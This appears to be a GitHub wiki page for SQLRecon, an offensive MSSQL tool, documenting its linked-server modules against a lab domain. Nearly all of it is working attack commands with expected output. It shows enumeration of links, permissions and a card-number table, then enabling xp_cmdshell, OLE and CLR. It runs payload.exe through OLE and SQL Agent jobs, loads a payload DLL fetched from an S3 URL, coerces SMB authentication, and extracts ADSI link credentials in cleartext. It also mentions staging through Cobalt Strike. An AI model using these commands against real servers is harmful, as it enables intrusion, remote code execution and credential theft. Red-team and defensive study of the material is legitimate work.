Skip to content

5. Linked Modules

Sanjiv Kawa edited this page Jul 2, 2024 · 2 revisions

Linked modules are executed against one or more instances of SQL server.

Executing modules against multiple linked SQL servers

We use the links module to demonstrate that SQL01 has a link to SQL02, and SQL03.

> SQLRecon.exe /a:WinToken /h:SQL01 /m:links

[*] Executing the 'links' module on SQL01


| Linked Server | product    | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ---------- | -------- | ----------- | ----------- | --------------- | ------------ |
| SQL02         | SQL Server | SQLNCLI  | SQL02       | N/A         |                 |              |
| SQL03         | SQL Server | SQLNCLI  | SQL03       | N/A         |                 |              |

As SQL01 has multiple links, we can execute modules against both linked servers. An example of this has been demonstrated in the "Info" section below.

Info

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /m:info

Expected Output:

[*] (1/2) Executing the 'info' module on SQL02 via SQL01


| Object                    | Value                                 |
| ------------------------- | ------------------------------------- |
| ComputerName              | SQL02                                 |
| DomainName                | KAWALABS                              |
| ServicePid                | 2612                                  |
| rpc_OsMachineType         | ServerNT                              |
| rpc_OsVersion             | Windows Server 2022 Standard          |
| SqlServerServiceName      | MSSQLSERVER                           |
| rpc_SqlServiceAccountName | KAWALABS\mssql_svc                    |
| rpc_AuthenticationMode    | Windows and SQL Server Authentication |
| rpc_ForcedEncryption      | 0                                     |
| Clustered                 | No                                    |
| SqlVersionNumber          | 16.0.1000.6                           |
| SqlMajorVersionNumber     | 2022                                  |
| SqlServerEdition          | Developer Edition (64-bit)            |
| SqlServerServicePack      | RTM                                   |
| OsArchitecture            | X64                                   |
| OsVersionNumber           | 2022                                  |
| CurrentLogon              | sa                                    |
| ActiveSessions            | 1                                     |


[*] (2/2) Executing the 'info' module on SQL03 via SQL01


| Object                    | Value                                 |
| ------------------------- | ------------------------------------- |
| ComputerName              | SQL03                                 |
| DomainName                | KAWALABS                              |
| ServicePid                | 1920                                  |
| rpc_OsMachineType         | ServerNT                              |
| rpc_OsVersion             | Windows Server 2022 Standard          |
| SqlServerServiceName      | MSSQLSERVER                           |
| rpc_SqlServiceAccountName | NT Service\MSSQLSERVER                |
| rpc_AuthenticationMode    | Windows and SQL Server Authentication |
| rpc_ForcedEncryption      | 0                                     |
| Clustered                 | No                                    |
| SqlVersionNumber          | 16.0.1000.6                           |
| SqlMajorVersionNumber     | 2022                                  |
| SqlServerEdition          | Developer Edition (64-bit)            |
| SqlServerServicePack      | RTM                                   |
| OsArchitecture            | X64                                   |
| OsVersionNumber           | 2022                                  |
| CurrentLogon              | sa                                    |
| ActiveSessions            | 37                                    |

Whoami

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:whoami

Expected Output:

Executing the 'whoami' module on SQL02 via SQL01

[*] Logged in as sa
[*] Mapped to the user dbo

[*] Server Permissions:

| permission_name                               |
| --------------------------------------------- |
| CONNECT SQL                                   |
| SHUTDOWN                                      |
| CREATE ENDPOINT                               |
| CREATE ANY DATABASE                           |
| CREATE AVAILABILITY GROUP                     |
| CREATE LOGIN                                  |
| ALTER ANY LOGIN                               |
| ALTER ANY CREDENTIAL                          |
| ALTER ANY ENDPOINT                            |
| ALTER ANY LINKED SERVER                       |
| ALTER ANY CONNECTION                          |
| ALTER ANY DATABASE                            |
| ALTER RESOURCES                               |
| ALTER SETTINGS                                |
| ALTER TRACE                                   |
| ALTER ANY AVAILABILITY GROUP                  |
| ADMINISTER BULK OPERATIONS                    |
| AUTHENTICATE SERVER                           |
| EXTERNAL ACCESS ASSEMBLY                      |
| VIEW ANY DATABASE                             |
| VIEW ANY SECURITY DEFINITION                  |
| VIEW ANY PERFORMANCE DEFINITION               |
| VIEW ANY DEFINITION                           |
| VIEW SERVER SECURITY STATE                    |
| VIEW SERVER PERFORMANCE STATE                 |
| VIEW SERVER STATE                             |
| CREATE DDL EVENT NOTIFICATION                 |
| CREATE TRACE EVENT NOTIFICATION               |
| ALTER ANY EVENT NOTIFICATION                  |
| ALTER SERVER STATE                            |
| UNSAFE ASSEMBLY                               |
| ALTER ANY SERVER AUDIT                        |
| CREATE SERVER ROLE                            |
| ALTER ANY SERVER ROLE                         |
| CREATE ANY EVENT SESSION                      |
| DROP ANY EVENT SESSION                        |
| ALTER ANY EVENT SESSION OPTION                |
| ALTER ANY EVENT SESSION ADD EVENT             |
| ALTER ANY EVENT SESSION DROP EVENT            |
| ALTER ANY EVENT SESSION ENABLE                |
| ALTER ANY EVENT SESSION DISABLE               |
| ALTER ANY EVENT SESSION ADD TARGET            |
| ALTER ANY EVENT SESSION DROP TARGET           |
| ALTER ANY EVENT SESSION                       |
| CONNECT ANY DATABASE                          |
| IMPERSONATE ANY LOGIN                         |
| SELECT ALL USER SECURABLES                    |
| VIEW ANY CRYPTOGRAPHICALLY SECURED DEFINITION |
| VIEW ANY ERROR LOG                            |
| VIEW SERVER SECURITY AUDIT                    |
| CONTROL SERVER                                |


[*] Database Permissions:

| permission_name                              |
| -------------------------------------------- |
| CREATE TABLE                                 |
| CREATE VIEW                                  |
| CREATE PROCEDURE                             |
| CREATE FUNCTION                              |
| CREATE RULE                                  |
| CREATE DEFAULT                               |
| BACKUP DATABASE                              |
| BACKUP LOG                                   |
| CREATE DATABASE                              |
| CREATE TYPE                                  |
| CREATE ASSEMBLY                              |
| CREATE XML SCHEMA COLLECTION                 |
| CREATE SCHEMA                                |
| CREATE SYNONYM                               |
| CREATE AGGREGATE                             |
| CREATE ROLE                                  |
| CREATE MESSAGE TYPE                          |
| CREATE SERVICE                               |
| CREATE CONTRACT                              |
| CREATE REMOTE SERVICE BINDING                |
| CREATE ROUTE                                 |
| CREATE QUEUE                                 |
| CREATE SYMMETRIC KEY                         |
| CREATE ASYMMETRIC KEY                        |
| CREATE EXTERNAL LANGUAGE                     |
| CREATE EXTERNAL LIBRARY                      |
| CREATE FULLTEXT CATALOG                      |
| CREATE CERTIFICATE                           |
| CREATE DATABASE DDL EVENT NOTIFICATION       |
| CREATE USER                                  |
| CONNECT                                      |
| CONNECT REPLICATION                          |
| CHECKPOINT                                   |
| SUBSCRIBE QUERY NOTIFICATIONS                |
| AUTHENTICATE                                 |
| SHOWPLAN                                     |
| ALTER ANY USER                               |
| ALTER ANY ROLE                               |
| ALTER ANY APPLICATION ROLE                   |
| ALTER ANY COLUMN ENCRYPTION KEY              |
| ALTER ANY COLUMN MASTER KEY                  |
| ALTER ANY SCHEMA                             |
| ALTER ANY ASSEMBLY                           |
| ALTER ANY DATABASE SCOPED CONFIGURATION      |
| ALTER ANY DATASPACE                          |
| ALTER ANY EXTERNAL DATA SOURCE               |
| ALTER ANY EXTERNAL FILE FORMAT               |
| ALTER ANY EXTERNAL LIBRARY                   |
| ALTER ANY EXTERNAL LANGUAGE                  |
| ALTER ANY EXTERNAL STREAM                    |
| ALTER ANY EXTERNAL JOB                       |
| ALTER ANY MESSAGE TYPE                       |
| ALTER ANY CONTRACT                           |
| ALTER ANY SERVICE                            |
| ALTER ANY REMOTE SERVICE BINDING             |
| ALTER ANY ROUTE                              |
| ALTER ANY FULLTEXT CATALOG                   |
| ALTER ANY SYMMETRIC KEY                      |
| ALTER ANY ASYMMETRIC KEY                     |
| ALTER ANY CERTIFICATE                        |
| ALTER ANY SECURITY POLICY                    |
| SELECT                                       |
| INSERT                                       |
| UPDATE                                       |
| DELETE                                       |
| REFERENCES                                   |
| EXECUTE                                      |
| ALTER ANY DATABASE DDL TRIGGER               |
| ALTER ANY DATABASE EVENT NOTIFICATION        |
| ALTER ANY DATABASE AUDIT                     |
| CREATE ANY DATABASE EVENT SESSION            |
| DROP ANY DATABASE EVENT SESSION              |
| ALTER ANY DATABASE EVENT SESSION OPTION      |
| ALTER ANY DATABASE EVENT SESSION ADD EVENT   |
| ALTER ANY DATABASE EVENT SESSION DROP EVENT  |
| ALTER ANY DATABASE EVENT SESSION ENABLE      |
| ALTER ANY DATABASE EVENT SESSION DISABLE     |
| ALTER ANY DATABASE EVENT SESSION ADD TARGET  |
| ALTER ANY DATABASE EVENT SESSION DROP TARGET |
| ALTER ANY DATABASE EVENT SESSION             |
| KILL DATABASE CONNECTION                     |
| VIEW ANY COLUMN ENCRYPTION KEY DEFINITION    |
| VIEW ANY COLUMN MASTER KEY DEFINITION        |
| VIEW DATABASE SECURITY STATE                 |
| VIEW DATABASE PERFORMANCE STATE              |
| VIEW DATABASE STATE                          |
| VIEW SECURITY DEFINITION                     |
| VIEW PERFORMANCE DEFINITION                  |
| VIEW DEFINITION                              |
| TAKE OWNERSHIP                               |
| ALTER                                        |
| ALTER ANY MASK                               |
| UNMASK                                       |
| EXECUTE ANY EXTERNAL SCRIPT                  |
| ADMINISTER DATABASE BULK OPERATIONS          |
| ALTER ANY SENSITIVITY CLASSIFICATION         |
| VIEW ANY SENSITIVITY CLASSIFICATION          |
| VIEW CRYPTOGRAPHICALLY SECURED DEFINITION    |
| ENABLE LEDGER                                |
| ALTER LEDGER                                 |
| VIEW LEDGER CONTENT                          |
| EXECUTE ANY EXTERNAL ENDPOINT                |
| VIEW DATABASE SECURITY AUDIT                 |
| ALTER LEDGER CONFIGURATION                   |
| CONTROL                                      |


[*] Database Roles:

| Role              | Membership |
| ----------------- | ---------- |
| public            | Yes        |
| db_owner          | No         |
| db_accessadmin    | No         |
| db_securityadmin  | No         |
| db_ddladmin       | No         |
| db_backupoperator | No         |
| db_datareader     | No         |
| db_datawriter     | No         |
| db_denydatareader | No         |
| db_denydatawriter | No         |
| sysadmin          | Yes        |
| setupadmin        | Yes        |
| serveradmin       | Yes        |
| securityadmin     | Yes        |
| processadmin      | Yes        |
| diskadmin         | Yes        |
| dbcreator         | Yes        |
| bulkadmin         | Yes        |

Users

SQLRecon.exe /a:WinToken /h:SQL03 /l:MECM01 /m:users

Expected Output:

[*] Executing the 'users' on MECM01 via SQL03

[*] Users in the 'master' database

| username            | create_date         | modify_date         | type         | authentication_type |
| ------------------- | ------------------- | ------------------- | ------------ | ------------------- |
| NT AUTHORITY\SYSTEM | 6/7/2023 9:32:08 AM | 6/7/2023 9:32:08 AM | WINDOWS_USER | WINDOWS             |
| guest               | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER     | NONE                |
| dbo                 | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER     | INSTANCE            |

[*] Server principals

| name                         | type_desc     | is_disabled | create_date           | modify_date           |
| ---------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| KAWALABS\JSmith              | WINDOWS_LOGIN | False       | 6/4/2024 11:15:37 AM  | 6/4/2024 11:15:37 AM  |
| KAWALABS\acon                | WINDOWS_LOGIN | False       | 6/4/2024 11:15:37 AM  | 6/4/2024 11:15:37 AM  |
| NT AUTHORITY\NETWORK SERVICE | WINDOWS_LOGIN | False       | 6/7/2023 9:58:19 AM   | 6/7/2023 9:58:19 AM   |
| MECM01\ConfigMgr_DViewAccess | WINDOWS_GROUP | False       | 6/7/2023 9:37:35 AM   | 6/7/2023 9:37:35 AM   |
| NT AUTHORITY\SYSTEM          | WINDOWS_LOGIN | False       | 6/6/2023 12:39:59 PM  | 6/7/2023 9:32:08 AM   |
| NT SERVICE\SQLTELEMETRY      | WINDOWS_LOGIN | False       | 6/6/2023 12:39:59 PM  | 6/6/2023 12:39:59 PM  |
| NT SERVICE\SQLSERVERAGENT    | WINDOWS_LOGIN | False       | 6/6/2023 12:39:59 PM  | 6/6/2023 12:39:59 PM  |
| sa                           | SQL_LOGIN     | False       | 4/8/2003 9:10:35 AM   | 6/6/2023 12:39:59 PM  |
| NT SERVICE\MSSQLSERVER       | WINDOWS_LOGIN | False       | 6/6/2023 12:39:59 PM  | 6/6/2023 12:39:59 PM  |
| NT SERVICE\Winmgmt           | WINDOWS_LOGIN | False       | 6/6/2023 12:39:59 PM  | 6/6/2023 12:39:59 PM  |
| NT SERVICE\SQLWriter         | WINDOWS_LOGIN | False       | 6/6/2023 12:39:59 PM  | 6/6/2023 12:39:59 PM  |
| KAWALABS\Domain Admins       | WINDOWS_GROUP | False       | 6/6/2023 12:39:59 PM  | 6/6/2023 12:39:59 PM  |
| KAWALABS\mssccm_svc          | WINDOWS_LOGIN | False       | 6/6/2023 12:39:59 PM  | 6/6/2023 12:39:59 PM  |
| public                       | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin                     | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin                | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin                  | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin                   | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin                 | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin                    | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator                    | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin                    | SERVER_ROLE   | False       | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |

Databases

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:databases

Expected Output:

[*] Executing the 'databases' on SQL02 via SQL01


| dbid | name     | crdate               | filename                                                                          |
| ---- | -------- | -------------------- | --------------------------------------------------------------------------------- |
| 1    | master   | 4/8/2003 9:13:36 AM  | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\master.mdf   |
| 2    | tempdb   | 6/13/2024 8:56:06 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\tempdb.mdf   |
| 3    | model    | 4/8/2003 9:13:36 AM  | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\model.mdf    |
| 4    | msdb     | 10/8/2022 6:31:57 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf |
| 5    | Payments | 4/24/2023 2:49:01 PM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\Payments.mdf |

Tables

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:tables /db:Payments

Expected Output:

[*] Executing the 'tables' on SQL02 via SQL01

[*] Tables in 'Payments'

| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE |
| ------------- | ------------ | ---------- | ---------- |
| Payments      | dbo          | cc         | BASE TABLE |

Columns

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:columns /db:Payments /table:cc

Expected Output:

[*] Executing the 'columns' on SQL02 via SQL01

[*] Displaying columns from 'Payments' in 'cc'

| COLUMN_NAME |
| ----------- |
| card_brand  |
| card_num    |

Rows

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:rows /db:Payments /table:cc

Expected Output:

[*] Executing the 'rows' on SQL02 via SQL01

[*] Displaying number of rows from 'cc' in 'Payments'

| row_count |
| --------- |
| 31        |

Search

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:search /db:Payments /keyword:card

Expected Output:

[*] Executing the 'search' on SQL02 via SQL01

[*] Searching for columns containing 'card' in 'Payments'

| table_name | column_name |
| ---------- | ----------- |
| cc         | card_brand  |
| cc         | card_num    |

Query

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:query /c:"select @@servername"

Expected Output:

[*] Executing the 'query' module on SQL02 via SQL01

[*] Executing 'select @@servername'

| column0 |
| ------- |
| SQL02   |

Smb

SQLRecon.exe /a:WinToken /h:SQL03 /l:MECM01 /m:smb /unc:\\172.16.10.10\some-path

Expected Output:

[*] Executing the 'smb' on MECM01 via SQL03

[*] Sent SMB request request

Links

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:links

Expected Output:

[*] Executing the 'links' on SQL03 via SQL02


| Linked Server | product                             | provider     | data_source         | Local Login | Is Self Mapping | Remote Login   |
| ------------- | ----------------------------------- | ------------ | ------------------- | ----------- | --------------- | -------------- |
| LINKADSI      | Active Directory Service Interfaces | ADsDSOObject | dc01.kawalabs.local | N/A         | False           | kawalabs\admin |
| MECM01        | SQL Server                          | SQLNCLI      | MECM01              | N/A         | False           | sa             |

Impersonate

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:impersonate

Expected Output:

[*] Executing the 'impersonate' on SQL03 via SQL02


| User | Can Impersonate? |
| ---- | ---------------- |
| sa   | True             |

CheckRpc

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:checkrpc

Expected Output:

Executing the 'checkrpc' module on SQL02 via SQL01

[*] The following SQL servers can have RPC configured.

| name  | is_rpc_out_enabled |
| ----- | ------------------ |
| SQL02 | True               |
| SQL03 | True               |

DisableXp

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:disablexp

Expected Output:

Executing the 'disablexp' module on SQL02 via SQL01

| configuration_id | name        | value | value_in_use | description                     |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390            | xp_cmdshell | 0     | 0            | Enable or disable command shell |

EnableXp

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:enablexp

Expected Output:

Executing the 'enablexp' module on SQL02 via SQL01

| configuration_id | name        | value | value_in_use | description                     |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390            | xp_cmdshell | 1     | 1            | Enable or disable command shell |

DisableOle

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:disableole

Expected Output:

[*] Executing the 'disableole' module on SQL02 via SQL01

| configuration_id | name                      | value | value_in_use | description                                 |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388            | Ole Automation Procedures | 0     | 0            | Enable or disable Ole Automation Procedures |

EnableOle

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:enableole

Expected Output:

[*] Executing the 'enableole' module on SQL02 via SQL01

| configuration_id | name                      | value | value_in_use | description                                 |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388            | Ole Automation Procedures | 1     | 1            | Enable or disable Ole Automation Procedures |

DisableClr

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:disableclr

Expected Output:

[*] Executing the 'disableclr' module on SQL02 via SQL01

| configuration_id | name        | value | value_in_use | description                                   |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562             | clr enabled | 0     | 0            | CLR user code execution enabled in the server |

EnableClr

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:enableclr

Expected Output:

[*] Executing the 'enableclr' module on SQL02 via SQL01

| configuration_id | name        | value | value_in_use | description                                   |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562             | clr enabled | 1     | 1            | CLR user code execution enabled in the server |

XpCmd

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:xpcmd /c:'notepad'

Expected Output:

[*] Executing the 'xpcmd' on SQL02 via SQL01

Executing 'notepad'

[*] 'notepad' executed.

OleCmd

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:olecmd /c:'c:\temp\payload.exe

Expected Output:

[*] Executing the 'olecmd' on SQL02 via SQL01

[*] Executing 'c:\temp\payload.exe'

[*] Setting sp_oacreate to 'RJXTbxom'.
[*] Setting sp_oamethod to 'QGRKvvKb'.
[+] Executed command. Destroyed 'RJXTbxom' and 'QGRKvvKb'.

Clr

A custom .NET assembly can be supplied to SQLRecon in three ways:

  • Local file path
  • SMB file path
  • HTTP/S URL

Please refer to sql.cs or hollow.cs to see how to build a custom DLL that is compatible with SQL CLR attacks.

Clr - File Path

If you are looking to supply the DLL using a local file path, please note that the DLL has to reside on the compromised host. For example, if you are using a C2 framework like Cobalt Strike, you will need to:

  • Upload hollow.dll to the system you have a beacon on.
  • Then use inline-ExecuteAssembly or execute-assembly to execute SQLRecon. The location of the DLL on disk should be passed into the /dll: flag. The function which you want executed should be passed into the /function: flag.
  • You can then delete the DLL after the command has run.

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:clr /dll:'c:\temp\sql.dll' /function:CustomFunctionName

Expected Output:

[*] Executing the 'clr' on SQL02 via SQL01

[*] c:\temp\sql.dll is 3584 bytes.
[+] Added SHA-512 hash for 'c:\temp\sql.dll' to sys.trusted_assemblies with a random name of 'kMQhsOWi'.
[*] Creating a new custom assembly with the name 'JySddqEy'.
[+] Created a new custom assembly with the name 'JySddqEy' and loaded the DLL into it.
[*] Loading DLL into stored procedure 'CustomFunctionName'.
[+] Created '[JySddqEy].[StoredProcedures].[CustomFunctionName]'.
[*] Executing payload ...
[*] Cleaning up. Deleting assembly 'JySddqEy', stored procedure 'CustomFunctionName' and hash from sys.trusted_assembly.

Clr - HTTP/S URL

You can also supply the location of a DLL to SQLRecon via a HTTP or HTTPS link. In the example below, I've uploaded sql.dll to an AWS S3 bucket and created a temporary pre-signed URL.

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:clr /dll:"https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>" /function:CustomFunctionName

Expected Output:

[*] Executing the 'clr' module on SQL01

[+] Downloading DLL from: https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>
[+] DLL is 3584 bytes.
[+] Added SHA-512 hash for 'https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>' to sys.trusted_assemblies with a random name of 'pOSvCPBU'.
[+] Creating a new custom assembly with the name 'kTMflwIP'.
[+] Created a new custom assembly with the name 'kTMflwIP' and loaded the DLL into it.
[+] Loading DLL into stored procedure 'CustomFunctionName'.
[+] Created '[kTMflwIP].[StoredProcedures].[CustomFunctionName]'.
[+] Executing payload ...
[+] Cleaning up. Deleting assembly 'kTMflwIP', stored procedure 'CustomFunctionName' and hash from sys.trusted_assembly.

AgentStatus

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:agentstatus

Expected Output:

[*] Executing the 'agentstatus' on SQL03 via SQL02

[*] SQL agent is running on SQL03.
[*] Agent Jobs on SQL03

| job_id                               | name                    | enabled | date_created          | date_modified         |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1       | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |

AgentCmd - CmdExec

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:agentcmd /subsystem:cmdexec /command:'c:\temp\payload.exe

Expected Output:

[*] Executing the 'agentcmd' on SQL02 via SQL01

[*] Executing 'c:\temp\payload.exe' using the 'cmdexec' subsystem.

[*] Setting job_name to 'NLjyPukm'.
[*] Setting step_name to 'ksXgRDmg'.
[*] Agent Jobs on SQL02

| job_id                               | name                    | enabled | date_created         | date_modified        |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1       | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
| 06f09afa-6625-4b6d-9e86-b4d7a688e9ea | NLjyPukm                | 1       | 7/2/2024 8:25:15 AM  | 7/2/2024 8:25:15 AM  |

[*] Executing job 'NLjyPukm' and waiting for 5 seconds ...
[*] Agent Jobs on SQL02

| job_id                               | name                    | enabled | date_created         | date_modified        |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1       | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |

[+] Deleting job 'NLjyPukm' on SQL02.

AgentCmd - PowerShell

PowerShell is the default Agent Job subsystem.

SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:agentcmd /c:'c:\temp\payload.exe'

Expected Output:

[*] Executing the 'agentcmd' on SQL02 via SQL01

[*] Executing 'c:\temp\payload.exe' using the 'powershell' subsystem.

[*] Setting job_name to 'czuXmwBD'.
[*] Setting step_name to 'pKCxRKlE'.
[*] Agent Jobs on SQL02

| job_id                               | name                    | enabled | date_created         | date_modified        |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1       | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
| e2880b29-5b31-4871-883e-01f10e7045c2 | czuXmwBD                | 1       | 7/2/2024 8:25:23 AM  | 7/2/2024 8:25:23 AM  |

[*] Executing job 'czuXmwBD' and waiting for 5 seconds ...
[*] Agent Jobs on SQL02

| job_id                               | name                    | enabled | date_created         | date_modified        |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1       | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |

[+] Deleting job 'czuXmwBD' on SQL02.

Adsi

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:adsi /adsi:linkadsi /lport:30000

Expected Output:

[*] Executing the 'adsi' on SQL03 via SQL02

[*] Obtaining ADSI credentials for 'linkadsi'

[+] Added SHA-512 hash for LDAP server assembly to sys.trusted_assemblies with a random name of 'zRUYwcAe'.
[*] Creating a new LDAP server assembly with the name 'ldapServer'.
[+] Created a new LDAP server assembly with the name 'ldapServer'.
[*] Loading LDAP server assembly into a new CLR runtime routine 'WcZShuab'.
[+] Created '[ldapServer].[ldapAssembly.LdapSrv].[WcZShuab]'.
[*] Starting a local LDAP server on port 30000.
[*] Executing LDAP solicitation ...
[+] Obtained ADSI link credentials
 |-> kawalabs\admin:Password123
[*] Cleaning up. Deleting assembly 'ldapServer', function 'WcZShuab' and hash from sys.trusted_assembly.

Debug Example

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:users /debug

Expected Output:

[*] Debug mode enabled. No SQL queries will be executed.
[DEBUG] CLI Arguments:
 |-> /auth:WinToken
 |-> /host:SQL02
 |-> /link:SQL03
 |-> /module:users
 |-> /debug:
[DEBUG] Connecting to 'master' on SQL02:1433 using wintoken.
 |-> Connection String: Server=SQL02,1433; Database=master; Integrated Security=True; Connect Timeout=3;
 |-> Data Source: SQL02,1433
 |-> Database: master
 |-> Server Version: 16.00.1000
 |-> State: Open
 |-> Workstation ID: DESKTOP-LF8Q3C6
 |-> Packet Size: 8000
 |-> Client Connection ID: ed1c84c1-6580-4ca4-b7f0-c5b9040801e7
 |-> Application Name: DESKTOP-LF8Q3C6
[DEBUG] Module: users
 |-> Number of required standard arguments: 0
 |-> Number of required impersonate arguments: 1
 |-> Number of required linked arguments: 2
[DEBUG] Context Selected: Linked
 |-> Module: users
 |-> Number of required arguments: 2
[*] Executing the 'users' on SQL03 via SQL02

[*] Users in the 'master' database

[DEBUG] Query:
 |-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''A'', ''R'', ''X'') AND sid IS NOT null AND name NOT LIKE ''##%'' ORDER BY modify_date DESC;')

[*] Server principals

[DEBUG] Query:
 |-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''##%'' ORDER BY modify_date DESC;')

Verbose Example

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:users /verbose

Expected Output:

[VERBOSE] CLI Arguments:
 |-> /auth:WinToken
 |-> /host:SQL02
 |-> /link:SQL03
 |-> /module:users
 |-> /verbose:
[VERBOSE] Connecting to 'master' on SQL02:1433 using wintoken.
 |-> Connection String: Server=SQL02,1433; Database=master; Integrated Security=True; Connect Timeout=3;
 |-> Data Source: SQL02,1433
 |-> Database: master
 |-> Server Version: 16.00.1000
 |-> State: Open
 |-> Workstation ID: DESKTOP-LF8Q3C6
 |-> Packet Size: 8000
 |-> Client Connection ID: 76ea3f02-71e1-4a3c-a067-fc614d483703
 |-> Application Name: DESKTOP-LF8Q3C6
[*] Executing the 'users' on SQL03 via SQL02

[VERBOSE] Query:
 |-> SELECT name FROM sys.servers WHERE is_linked = 1;
[*] Users in the 'master' database

[VERBOSE] Query:
 |-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''A'', ''R'', ''X'') AND sid IS NOT null AND name NOT LIKE ''##%'' ORDER BY modify_date DESC;')
| username | create_date         | modify_date         | type     | authentication_type |
| -------- | ------------------- | ------------------- | -------- | ------------------- |
| guest    | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE                |
| dbo      | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE            |

[*] Server principals

[VERBOSE] Query:
 |-> SELECT * FROM OPENQUERY("SQL03", 'SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''##%'' ORDER BY modify_date DESC;')
| name                      | type_desc     | is_disabled | create_date           | modify_date           |
| ------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| sa                        | SQL_LOGIN     | False       | 4/8/2003 9:10:35 AM   | 6/20/2024 10:12:07 AM |
| BUILTIN\Users             | WINDOWS_GROUP | False       | 5/29/2024 11:52:55 AM | 5/29/2024 11:52:55 AM |
